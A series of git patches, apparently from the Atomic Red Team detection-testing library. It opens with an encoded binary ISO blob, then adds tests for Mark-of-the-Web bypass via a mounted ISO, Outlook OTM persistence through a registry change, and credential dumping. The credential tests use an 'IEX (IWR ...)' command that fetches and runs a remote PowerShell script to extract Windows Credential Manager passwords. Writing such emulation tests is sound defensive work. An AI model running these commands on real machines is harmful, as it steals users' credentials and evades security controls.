z&h8vx`wdf*FP@HLJa6_uyC3JOyx#6!{eN%f|6RG`!t>WpPHnic)3xk6cRB+*$MWZL z{EB*3(_Y)X_TYHa7eD{H`|tR=XaDWpau@gC(BuAm{GFa8?g{j`ye@vc zWo^^_cR6q8<l-P>#WR>k{knr+SV$!dwDst$wzIE)#12z zI@X7qnb+$n0enn^<+<#eo z^yy}#`#ihv@NwF)cQAf3AKH6O?463;hhEEI{EBhtN7Jn8{_2y{%yjoo#A_c5ui<7q zZZ|!?B5#@{-Pf}**01mGULTY0ZuWIw(e?3&>{Y&&HQndlJa>OiozFcln78iwW31}V zu_Ycm8UJqYiFs$@T<eT@s}1vS1w+B_4dn`UAVYCJu^J9b9iiWqI2=$eVysWmpt{v z6V?pJ-*7O#V{BhLo?v47;>CNWCZ0S!azkf)czW6R{GVI6Y-Do$$-~p*1ACV*ZjTR7 zjP8oR;ozFXKUzFhyM6GiPzcLxn*i}Z~P*E zeP{XzpLON@v$o@M=y~Foz>z)q%j(9?-p*KiEZ<(dczAkfV(;V&J5!6>dq&rdL_~sd z*YMbMXKtwOlbqk<)y%*2^Y8H5*PMS4AvUZzfBuBxMxM6IQ46$ZKNq`h0tAj;U}5zC!|||}J^P)l^P~TL`4kWK zzUTilQ2Kjw7v-RbF8P^F_uC&2^j`08nzi{_7asP_nz-#kfB*pk1dc}F*eL#vc)+4_ z4zva%De-^K%y#hHtF~<&TyZo{b)W9d`nBWDiTP0<=*_-QWqdFK1PBlyP!>3D?(6^Y zhxIqhqo?_QJh~7dK!5-N0(A@YNB;-9BOYk2$S{bKS18)LVy4P0t5)uA&~ulVT_XfU#0(b9I7b@5FkK+KtUk;pMO?W z_Ww!xU(m8lfB*pk1nLmT{*T8f+5gr0U&o=Ef&c*m1PBxavj6#~8E5}5(Eoy#WdZ~U z5Fk*8K=wcXjKA#vh5BE|p_+mK0RjXF6a=#WyJJuG|04Y_XjvvefB*pkbqHktUlgNc z|DUY?bsVZG2oNAZfIvYY`#%+Xvj0!f|ALlf0t5&UAW(-u_J2A?$^Ng=|2huU6a)wm zAV8oXko}*DJ=y<@^}nEHnE(L-1PIh2kp15iqh$Y|s{eHyswoH%AV7dXK_L6TH}+)z zFVX*kmSqA22oNAphd}oK#W70uf35!4aj2#sK!5-N0tJEW|BbOH`@c^A3tE;55FkK+ zKpg_v|9vq^_Wx4-uj5cnL4W`O0t5;I+5eZsp6vg6{V!-)CP07y0RnXhWdC0pqh$Xt z)BidS)f5B>5FkLHAdvmPDfVRlH|T#s%Q6811PBnQLm>PAvKS@%f4TnGaj2#sK!5-N z0tJEW|I1@f_Wug~FKAgNK!5-N0(A&v|6dWKWdEJZ5Oe`Ac2{oknnbsVZG2oNAZfIvYY`~OX`C;Pui{|j1{2@oJafIuAr+5cC?DB1t3 z^uLZnH3b0z1PBl)2xR|X9ec9>oAtk-Wtjj00t5)uA&~w5<`^aWzeWG+I8;**AV7cs zfr3Ex|65{D_W$ekzo2EA009C72-G2v{eMl2lKtPR|8*RyDF_fCK!89&Ap8HVu_yb# zP5%p8mI)9bK!89U0@?p>i&3)w+x5SWLp22f0t5&UCwiJZG64bv2oR`4Ap8G4F-rFTIr?A6p_+mK0RjXF6a=#W-y3_f z|IgL`f|g|h1PBlyP=`SF|NCN;?Emxhzm7vS1pxvC2oNX;WdCoDJ=y=~>wiJZG64bv z2oR`4Ap8IN7$y6Eo&MKxsHPx5fB*pk1%d4U8)8rPe^~zuT9yeAAV7dX9Rk_^?~hTk z|2y=*jzcvC0RjXF5GV*_|9>F%WdBF>zo2EA009C72-G2v{r|xjCHucq|LZtZQxG6P zfB=DlK=%KQu_ycA(f@*$WdZ~U5Fk*8K=%KKVwCLvF8#0LP)$LA009C73If^xH^rXp z|MmJ`(6UT`009C7>JZ5Ozd1(9{@pn|ALlf0t5&U zAW(-u_W!LhO7{N+`d`PPnt}iU0t5&Y1hW4>9DB0=FVz2nmSqA22oNAphd}oKM`D!h z|Cs*Qaj2#sK!5-N0tJEW|BuF=?Ekp_7ql!BAV7csfjR`T|8I*?vi}qMU&o=Ef&c*m z1PBxavj0C8d$RwN`d`qpOn?9Z0tD(1$o~I$jFSD|t^ai#swoH%AV7dXK_L78_SlpC zf06zdv@8=KK!5;&Is~%+KM|v3|EKi7jzcvC0RjXF5GV*_|9>*}WdEo2zo2EA009C7 z2-G2v{r{;LCHp_4|8*RyDF_fCK!89&Ap8H*u_yb#NB;|2mI)9bK!89U0@?p}#3W)f5B>5FkLHAdvn4`Ph^Fe}(=Rv@8=KK!5;&Is~%+?~75g z|NHg7jzcvC0RjXF5GV*_|KA^bvj4Bt|ALlf0t5&UAW(-u_Wu`Rl5FkLHAdvn4rP!1G|2F+EXjvvefB*pkbqHkte>q0U{=ZiL>o`7(*J^% zWdZ~U5Fk*8K=%LFVwCLvck6#0hiVD}1PBlyP!P!e|9b4n{(q1D7ql!BAV7csfjR`T z|DTLevj5+!|8*RyDF_fCK!89&Ap8Ftu_ycgefnR}vP^&g0RjZ-5Xk<2Dn`lv->m<2 z9I7b@5FkK+KtUk;|C_NV`~Q0VFKAgNK!5-N0(A&v|9>k+$^O4V|LZtZQxG6PfB=Dl zK=%LBu_ycg{rX?fvP^&g0RjZ-5Xk=jc8rq!{{j84<4{dOfB*pk1PTJ#|KEu{+5aEZ z|ALlf0t5&UAW(-u_WyTdlo`(049I7b@5FkK+KtUk;e{1Z?{{Mvj7ql!BAV7csfjR`T|9=^y zWdDCs|LZtZQxG6PfB=DlK=%KyVo&z}r}V#|Wtjj00t5)uA&~w5>lh{b|I_+k$Dx{n z009C72owae|9=yEvj6YU|ALlf0t5&UAW(-u_W!mRCHwzQ{jcLtO+kPF0RjXH0@?r1 z#-8l|&**PAw=qig|6TfD$Dx{n009C72owae|9=;Ivj6Ya|ALlf z0t5&UAW(-u_W$o=lVF-FY6=1b2oNAp5Xk<2F7{;q-=qHpEz1N55FkLH4uS0d zKg1~6|M%*D9fxWP0t5&UAW#s<{{Lg_$^QSG{ui_?6Cgl<0D(FLvj6`Sqh$YoUjOSj zR8tTjK!5;&fJZ5Oe?CUZ{=Z-U>o`{ui_?6Cgl<0D(FLvj6`Qqh$X-p#OCoswoH%AV7dXK_L78udyfl|3UpP zXjvvefB*pkbqHkt|1Czz{(ngS>o`JZ5O|7VPn{r`ym z*Kw$(AV7cs0Rjbq?Einop6vfe^}nEHnE(L-1PIh2kp2Jf7$y7vOZs2Op_+mK0RjXF z6a=#WUyME3|6kVsf|g|h1PBlyP=`SF|9@hX?ElB~zm7vS1pxvC2oNX;WdFYud$Ru@ z*Z+c+WdZ~U5Fk*8K=%KCW0dUwujqdrhiVD}1PBlyP!P!ee>wJK|9@5g3tE;55FkK+ zKpg_v|J!4f?Efe9zm7vS1pxvC2oNX;WdHM${r@%nFKAgNK!5-N0(A&v|1@{{=0}1PBlyK%fqRtp71FO7{OZ^uLZnH3b0z1PBl) z2xR{k#GdT`r}V#|Wtjj00t5)uA&~t)Hb%+*|EB)eaj2#sK!5-N0tJEW|H9al{r@ff zFKAgNK!5-N0(A&v|Bs7Nvj3mf|2huU6a)wmAV8oXkp1tEJ=y=?*8hT*WdZ~U5Fk*8 zK=%Lm7$y7vJNjS8p_+mK0RjXF6a=#WC&ZrY|L^L5LCZ1$0t5&Us6!z8|Bx6Z`~Q3T zU&o=Ef&c*m1PBxavi}c_J=y=?*Z+c+WdZ~U5Fk*8K=%K{7$y7v2l`*fp_+mK0RjXF z6a=#WC&ixZ{~zjqLCZ1$0t5&Us6!z8|F9S(`~MmJuj5cnL4W`O0t5;I+5bhcC;R_L z`d`qpOn?9Z0tD(1$o@Y(M#=vFvHsU_sHPx5fB*pk1%d4U*TtUf|DWi8LCZ1$0t5&U zs6!z8e{zhH{r^+_uj5cnL4W`O0t5;I+5bnxp6vgh>3>1XG64bv2oR`4Ap8Hw7$y7v z=lWmAp_+mK0RjXF6a=#Wr^KG@|6k~TLCZ1$0t5&Us6!z8|EL%x`+uwc*Kw$(AV7cs z0Rjbq?Ek5;C;R`G`d`qpOn?9Z0tD(1$o@Y%M#=vFmHyXpsHPx5fB*pk1%d4UV`5MC z|F8AGpko`3=UG_YojKfB=E&1hW5E#8lb;hv|QH=W8GW z1PBly&`Tiue`PFW{}<_hFCzC5AV7csf$9XZ|3fiV_W$AfU)}i{hyVcs1PJsJ$o@Yq z7P9|er~kc(+(&=_0RjZ76UhEQJ*LY3pRE7Yov(oi5FkK+Kreyp|HfFz{y#$hdl9*h z009C72vjGK{ofQ*W&a3?5xI{50RjXFR40)AAC0N9|I78iy7M&<0RjXF5a=b4{eM9$WdB#_ ze=j2U5gwk6UYajvy2oNC9OCbBdHx{!0Pu2fkMD8O%fB*pk d)d^((UmR0q|1Z)1>dx0d1PBlyK%kev{{g8hV Date: Thu, 10 Jun 2021 03:44:49 +0000 Subject: [PATCH 14/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1553.005/T1553.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index 63f1ffe5..e31b4c2a 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml @@ -29,6 +29,7 @@ atomic_tests: name: powershell - name: Mount an ISO image and run executable from the ISO + auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc description: |- Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 3e4f1628..f4ac635b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -711,3 +711,4 @@ c33f3d80-5f04-419b-a13a-854d1cbdbf3a da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 002cca30-4778-4891-878a-aaffcfa502fa +42f22b00-0242-4afc-a61b-0da05041f9cc From 733963824bcca645eed9d18002db10671d2eb12c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 03:44:56 +0000 Subject: [PATCH 15/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 42 ++++++++++++- atomics/T1553.005/T1553.005.md | 59 ++++++++++++++++++- 6 files changed, 99 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 6e8aae4b..958c5b89 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -355,6 +355,7 @@ defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privi defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell +defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 690fbfdb..4835de52 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -234,6 +234,7 @@ defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privi defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell +defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bfb8c069..c55b55ee 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -624,6 +624,7 @@ - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) - Atomic Test #1: Mount ISO image [windows] + - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e53dfb2f..eeb67747 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -441,6 +441,7 @@ - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) - Atomic Test #1: Mount ISO image [windows] + - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows] - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f0f057a6..382838e1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27232,7 +27232,7 @@ defense-evasion: path_of_iso: description: Path to ISO file type: path - default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso + default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) @@ -27243,15 +27243,51 @@ defense-evasion: ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null - Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" ' - cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" + cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ' name: powershell + - name: Mount an ISO image and run executable from the ISO + auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc + description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web + and run hello.exe executable from the ISO. \nUpon successful execution, powershell + will download the .iso from the Atomic Red Team repo, mount the image, and + run the executable from the ISO image that will open command prompt echoing + \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 + Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + \ " + supported_platforms: + - windows + input_arguments: + path_of_iso: + description: Path to ISO file + type: path + default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso + dependency_executor_name: powershell + dependencies: + - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) + +' + prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null + Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" + executor: + command: | + $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly + $driveLetter = ($keep | Get-Volume).DriveLetter + invoke-item "$($driveLetter):\hello.exe" + cleanup_command: | + Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null + Stop-process -name "hello" -Force -ErrorAction ignore + name: powershell T1036.004: technique: external_references: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index c7f2e10e..f80a754a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -8,6 +8,8 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a - [Atomic Test #1 - Mount ISO image](#atomic-test-1---mount-iso-image) +- [Atomic Test #2 - Mount an ISO image and run executable from the ISO](#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso) +
@@ -22,7 +24,7 @@ Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon success #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\src\T1553.005.iso| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\T1553.005.iso| #### Attack Commands: Run with `powershell`! @@ -34,7 +36,7 @@ Mount-DiskImage -ImagePath "#{path_of_iso}" #### Cleanup Commands: ```powershell -Dismount-DiskImage -ImagePath "#{path_of_iso}" +Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null ``` @@ -48,7 +50,58 @@ if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null -Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}" +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" +``` + + + + +
+
+ +## Atomic Test #2 - Mount an ISO image and run executable from the ISO +Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. +Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". +ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path_of_iso | Path to ISO file | path | PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly +$driveLetter = ($keep | Get-Volume).DriveLetter +invoke-item "$($driveLetter):\hello.exe" +``` + +#### Cleanup Commands: +```powershell +Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null +Stop-process -name "hello" -Force -ErrorAction ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null +Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" ``` From 54486ba7a502f99d8e5c4dc002b703d8dd399f6c Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 9 Jun 2021 23:38:58 -0600 Subject: [PATCH 16/35] force the reg add and fix error where otm wasn't being created (#1511) Co-authored-by: Keith McCammon --- atomics/T1137/T1137.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 58a9a9e6..138d40bc 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml @@ -13,8 +13,8 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f From 2b3f9444ae06dfab3b109162422d2a651b37863c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 05:39:34 +0000 Subject: [PATCH 17/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1137/T1137.md | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 382838e1..4ebeaa43 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -41779,8 +41779,8 @@ persistence: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 6d0f575f..a7660ba0 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -28,8 +28,8 @@ Too achieve this two things must happened on the syste ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 -if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f +mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` From 1c799637ce172ab2e3050eed39eaa943f2a6807b Mon Sep 17 00:00:00 2001 From: Suman Kar <43452298+skar4444@users.noreply.github.com> Date: Thu, 10 Jun 2021 22:48:12 +0530 Subject: [PATCH 18/35] =?UTF-8?q?New=20Dump=20credentials=20from=20Windows?= =?UTF-8?q?=20Credential=20Manager=20With=20PowerShell=20=E2=80=A6=20(#150?= =?UTF-8?q?8)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * New Dump credentials from Windows Credential Manager With PowerShell [windows Credentials & web Credentials] * Update T1555.yaml * Update T1555.yaml * use permanent github link for script * use github permanent link for script Co-authored-by: Carrie Roberts --- atomics/T1555/T1555.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index 898b959a..1aa2eeed 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -28,3 +28,21 @@ atomic_tests: cleanup_command: | Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore name: powershell +- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] + description: This module will extract the credentials from Windows Credential Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] + description: This module will extract the credentials from Windows Credential Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force From f12343356726aacd67faffb7222e270ebc3ddea6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 10 Jun 2021 17:18:39 +0000 Subject: [PATCH 19/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1555/T1555.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index 1aa2eeed..e5e80e64 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -29,6 +29,7 @@ atomic_tests: Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] + auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 description: This module will extract the credentials from Windows Credential Manager supported_platforms: - windows @@ -38,6 +39,7 @@ atomic_tests: command: | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force - name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] + auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 description: This module will extract the credentials from Windows Credential Manager supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f4ac635b..e3e4f0c6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -712,3 +712,5 @@ da4f751a-020b-40d7-b9ff-d433b7799803 c35ac4a8-19de-43af-b9f8-755da7e89c89 002cca30-4778-4891-878a-aaffcfa502fa 42f22b00-0242-4afc-a61b-0da05041f9cc +c89becbe-1758-4e7d-a0f4-97d2188a23e3 +8fd5a296-6772-4766-9991-ff4e92af7240 From b97bfd31e604237eaaf8ef147dc634ba36eb8744 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 10 Jun 2021 17:18:45 +0000 Subject: [PATCH 20/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 26 ++++++++++ atomics/T1555/T1555.md | 52 +++++++++++++++++++ 6 files changed, 86 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 958c5b89..0eda063b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -11,6 +11,8 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell +credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell 